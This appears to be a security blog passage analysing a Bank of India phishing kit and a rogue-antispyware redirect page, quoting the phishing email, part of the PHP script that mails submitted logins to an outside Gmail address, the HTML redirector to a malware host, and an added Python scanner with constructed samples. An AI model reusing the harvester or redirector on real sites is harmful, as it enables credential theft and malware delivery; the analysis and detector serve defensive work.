Saturday, October 31, 2009

Bank Of India – Phish

With a long list of Indian bank phishing sites already recorded, there is now a rise in phishing aimed at "Bank Of India".

Here is the mail received, sent with the intention to phish:


Dear Customer,
Bank of India is constantly striving to provide you with more convenience, control, and security to assist in managing your finances.
As part of our ongoing efforts to make it easier and more secure for you to use our online services, we have upgraded to Consent and 
Online Access that you reviewed and accepted when you began-to use Bank of India Online® Banking service(s). 
To upgrade your Information, please visit our secure server webform by clicking the link below...
Upgrade My Account Security.
This alert relates to your Online Banking Profile only.

The "Upgrade My Account Security" link points to the following hacked site:

harveys.ie/images/inet/boi/BankAwayRetail.html

(screenshot: bank_phish)

This page reads the submitted account details and mails them to a Gmail address using a PHP script. The relevant part of the script:

<?php
// Phisher's mailbox: every submitted login ends up here
$recipient = "xxxxxx@gmail.com";
$subject = "boi login";
// Malformed header: no "From:" label, and the victim's own e-mail
// address is simply appended to it
$headers = "BOI@boi.co.in";
$headers .= $_POST['eMailAdd']."\n";
$headers .= "MIME-Version: 1.0\n";

// $message (the captured form fields) is not defined in this excerpt
if (mail($recipient,$subject,$message,$headers))
{
// On success the victim is bounced to the real bank so nothing looks wrong
header("Location: http://www.bankofindia.com/");

}
else
{
echo "ERROR! Please go back and try again.";
}

Two things worth checking on a compromised host: the mail() call is fed directly from $_POST, and the script ends with a redirect to the real bank, which is what stops the victim noticing anything.

More Rogue Antispyware from a Genuine Site

This has become the most common infection these days: rogue antispyware. The ways it spreads vary from fake codecs to a link to a genuine site that carries a page forwarding to a malicious site.

In our case this was a mail sent from a hacked Yahoo account with a link to a Hindu temple site.


hxxp://www.shrikhatushyamji.com/Wvse2KU8VD.html

This page contains nothing but a redirect to the malicious site, with a JavaScript redirect, a meta refresh fallback for browsers without JavaScript, and a plain link as a last resort:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>CONGRATULATIONS</title>
<script language="JavaScript1.1" type="text/javascript">
<!--
location.replace("http://vivilan.cn");
//-->
</script>
<noscript>
<meta http-equiv="Refresh" content="0; URL=http://vivilan.cn">
</noscript>
</head>
<body>
<a href="http://vivilan.cn">Click here...</a>
</body>
</html>




From vivilan.cn the page downloads Surprise.exe, detected as Trojan.TDSS.

This installs rogue antispyware as its payload.
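As an added example (not code from the original posts or from either compromised site), here is a small offline scanner in Python that looks for the two kinds of planted file described in the two posts above: the PHP harvester that mails form input to an outside mailbox and then redirects the victim to the real bank, and the HTML page whose only job is to forward the visitor to another domain through location.replace() or a meta refresh. The sample files, the form field names uid and pwd, and the host attacker.example are constructed for this example; nothing else from the real kits is on this page.

```python
import re
from urllib.parse import urlparse

# (1) PHP harvester indicators: mail() fed with form input, off-site addresses, bank redirect
MAIL_CALL = re.compile(r"\bmail\s*\(", re.I)
FORM_INPUT = re.compile(r"\$_(?:POST|REQUEST|GET)\s*\[", re.I)
EMAIL = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
LOCATION_HDR = re.compile(r"header\s*\(\s*[\"']Location:\s*([^\"']+)", re.I)

# (2) HTML redirector indicators: JavaScript location change or <meta http-equiv=refresh>
JS_REDIRECT = re.compile(
    r"(?:location\.replace\s*\(|(?:window\.)?location(?:\.href)?\s*=)\s*[\"']([^\"']+)[\"']", re.I)
META_TAG = re.compile(r"<meta\b[^>]*>", re.I)
REFRESH_TARGET = re.compile(r"content\s*=\s*[\"']?\s*\d+\s*;\s*url\s*=\s*([^\"'>\s]+)", re.I)


def _host(url):
    return (urlparse(url).hostname or "").lower()


def _off_site(url, site_domain):
    """True when url points at a host that is neither site_domain nor one of its subdomains."""
    host, site = _host(url), site_domain.lower()
    return bool(host) and host != site and not host.endswith("." + site)


def scan_php(src, site_domain):
    """Return a finding for a mail()-based harvester, or None for an ordinary form handler."""
    if not (MAIL_CALL.search(src) and FORM_INPUT.search(src)):
        return None
    # Addresses outside the hosting domain: where the captured data is going
    external = sorted({a for a in EMAIL.findall(src) if not a.lower().endswith("@" + site_domain.lower())})
    m = LOCATION_HDR.search(src)
    redirect = m.group(1).strip() if m else None
    # A contact form that mails the site's own staff and stays on-site is normal;
    # mailing form input elsewhere, or bouncing the sender to a third-party site, is not
    if not external and not (redirect and _off_site(redirect, site_domain)):
        return None
    return {"type": "php_form_mailer", "external_addresses": external, "redirect": redirect}


def scan_html(src, site_domain):
    """Return a finding when the page immediately forwards the visitor to another domain."""
    targets = JS_REDIRECT.findall(src)
    for tag in META_TAG.findall(src):
        if re.search(r"http-equiv\s*=\s*[\"']?refresh", tag, re.I):
            m = REFRESH_TARGET.search(tag)
            if m:
                targets.append(m.group(1))
    external = sorted({t for t in targets if _off_site(t, site_domain)})
    if not external:
        return None
    return {"type": "html_redirector", "targets": external}


def scan_site(files, site_domain):
    """files: {relative path: contents}. Returns [(path, finding)] for every suspicious file."""
    findings = []
    for path, src in files.items():
        f = scan_php(src, site_domain) if path.endswith(".php") else scan_html(src, site_domain)
        if f:
            findings.append((path, f))
    return findings


# Constructed samples (not the real files from the compromised hosts)
SAMPLE_FILES = {
    # Same shape as the kit quoted above; the field names uid/pwd are made up
    "images/inet/boi/login.php": """<?php
$recipient = "xxxxxx@gmail.com";
$subject = "boi login";
$headers = "From: BOI@boi.co.in";
$message = "user=" . $_POST['uid'] . " pass=" . $_POST['pwd'];
if (mail($recipient, $subject, $message, $headers)) {
    header("Location: http://www.bankofindia.com/");
}
?>""",
    # Same shape as the planted temple-site page; attacker.example stands in for the payload host
    "Wvse2KU8VD.html": """<html><head><title>CONGRATULATIONS</title>
<script>location.replace("http://attacker.example");</script>
<noscript><meta http-equiv="Refresh" content="0; URL=http://attacker.example"></noscript>
</head><body><a href="http://attacker.example">Click here...</a></body></html>""",
    # Legitimate contact form: mails site staff, redirect stays on-site
    "contact.php": """<?php
mail("webmaster@harveys.ie", "Contact", $_POST['msg'], "From: noreply@harveys.ie");
header("Location: /thanks.html");
?>""",
    # Legitimate page with an on-site refresh
    "moved.html": """<html><head><meta http-equiv="refresh" content="5; url=/new/index.html">
</head><body>This page has moved.</body></html>""",
}

if __name__ == "__main__":
    for path, finding in scan_site(SAMPLE_FILES, "harveys.ie"):
        print(path, finding)
```

To run it against a real web root, read each .php and .html file into the dict and pass the site's own domain; same-domain contact forms and same-site refresh pages are deliberately left alone so the output is only the planted files.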



APK spam on WhatsApp targeting bank users

Initial vector: a WhatsApp spam sender posing as Union Bank, with the bank's logo as its profile picture, shared an APK file named "Union Bank Aadhaar Update....